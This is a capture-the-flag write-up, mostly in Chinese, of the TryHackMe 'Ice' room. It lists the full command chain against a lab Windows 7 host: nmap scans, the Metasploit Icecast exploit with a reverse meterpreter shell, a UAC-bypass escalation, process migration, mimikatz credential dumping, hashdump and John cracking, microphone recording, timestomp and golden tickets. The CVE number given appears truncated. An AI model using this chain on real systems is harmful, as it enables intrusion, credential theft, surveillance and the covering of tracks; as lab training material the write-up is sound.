Ice (Try Hack Me Writeup)



  • 題目建議使用 SYN Scan
    • 可以發現指令是 -sS
    • sudo nmap -sS
      • 需要 root 權限 所以 sudo
└─$ sudo nmap -sS
[sudo] password for kali: 
Starting Nmap 7.91 ( ) at 2021-07-31 08:58 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 988 closed ports
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
8000/tcp  open  http-alt
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
  • 不管,還是run一次習慣的 -A 看看
sudo nmap -A
Starting Nmap 7.91 ( ) at 2021-07-31 09:00 EDT
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 09:02 (0:00:00 remaining)
Nmap scan report for
Host is up (0.28s latency).
Not shown: 988 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2021-07-30T12:49:58
|_Not valid after:  2022-01-29T12:49:58
|_ssl-date: 2021-07-31T13:02:27+00:00; 0s from scanner time.
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp  open  http         Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:bd:72:1c:16:7b (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-31T08:02:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-31T13:02:13
|_  start_date: 2021-07-31T12:49:56

TRACEROUTE (using port 110/tcp)
1   139.52 ms
2   ... 3
4   283.86 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds
  • Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
    • 一堆字,題目不會講重點ㄇ…他問 RDP 是什麼 Port
    • 3389
  • What service did nmap identify as running on port 8000? (First word of this service)
    • 用 -A 的 nmap 可以看出
    • 他是 Icecast
  • What does Nmap identify as the hostname of the machine? (All caps for the answer)
    • 一樣是 -A 的 nmap 有寫到 Host:
    • DARK-PC

Gain Access

  • Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use for this question and the next.
    • 我們知道他是 Icecast 就可以找到他的弱點
    • 不過我是直接 Google Icecast RCE
      • 我覺得 cvedetails 的搜尋很難用
    • 題目問說 Type
    • 所以是 Execute Code Overflow
  • What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
    • CVE-2004-156
  • After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.
    • 開啟 msf
      • msfconsole
    • 輸入 search icecast 尋找 icecast 相關攻擊 module
    • 可以找到 module 為
      • exploit/windows/http/icecast_header
  • 準備 Exploit
    • 輸入 use 0 或 use exploit/windows/http/icecast_header
    • 輸入 show options
    • 可以看到我們需要輸入的參數
      • RHOSTS
      • LHOST
    • set RHOSTS
    • set LHOSTS
    • 輸入 exploit


  • Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?
    • 他自動彈回了一個 meterpreter 的 shell
  • What user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.
    • 輸入 ps 可以看到所有的 process
    • 而如上圖,Icecast2.exe 使用者為 DARK
  • What build of Windows is the system?
    • 偵察系統版本有助於後續的工作
    • 可以輸入 sysinfo 觀察
    • 7601
  • Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?
    • 如上的 sysinfo ,可以看到架構是 x64
  • Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete
    • 接下來我們要使用 meterpreter 的自動 exploit 推薦器來做自動化測試
    • run post/multi/recon/local_exploit_suggester
  • Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?
    • 第一個回傳的是 exploit/windows/local/bypassuac_eventvwr
  • 按下鍵盤 ctrl + z 先把 meterpreter session 丟去背景
    • 準備來下 explit 指令
    • 輸入 use exploit/windows/local/bypassuac_eventvwr
    • 輸入 show options
    • 確認目前的 session ID
      • ID 為 1
    • 設定相關參數
      • set session 1
      • set LHOSTS
    • 輸入 run 開始執行
  • We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?
    • 輸入 getprivs 可以看到我們的權限
    • 他說要可以 take ownership of files
    • 所以是 SeTakeOwnershipPrivilege


  • Mentioned within this question is the term ‘living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
    • 他說要找印表機相關的程式
    • 先下 ps 觀察 processes
    • 透過 Google 可以發現是 spoolsv.exe
      • 他的 pid 是 1300
  • 輸入 getuid 觀察目前我們是什麼使用者
  • 輸入 migrate 1300
    • 把自己的 process 搬移到 pid 1300 上面
  • Let’s check what user we are now with the command getuid. What user is listed?
    • 再輸入一次 getuid
    • 會發現我們變成 NT AUTHORITY\SYSTEM 權限!
  • 輸入 load kiwi 載入 mimikatz
  • 輸入 help 觀察 mimikatz 使用方法
  • Which command allows up to retrieve all credentials?
    • creds_all
  • Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box 😉 (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)
    • 上面就有寫到 Dark 的密碼為 Password01!


  • What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)
    • 輸入 hashdump 可以 dump 出所有的密碼 hash
    • 其實我們在這邊也可以複製 Dark 的 hash 然後用 John 爆爆看
      • john hash.txt --wordlist=/opt/rockyou.txt --format=NT
      • 可以發現也是可以快速爆出密碼
  • While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?
    • 這題剛開始我以為是說螢幕截圖 screenshot
      • 輸入完之後會自動的存一張即時的圖檔
    • 不過後來發現他要是 real time,所以答案是 screenshare
      • 他會開一個 html 然後自動刷新、可以即時監看
  • How about if we wanted to record from a microphone attached to the system?
    • 監聽麥克風可以使用 record_mic
  • To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
    • 竄改 timestamp 可以用 timestomp
  • Mimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
    • golden_ticket_create
  • 可以透過 run post/windows/manage/enable_rdp 開啟RDP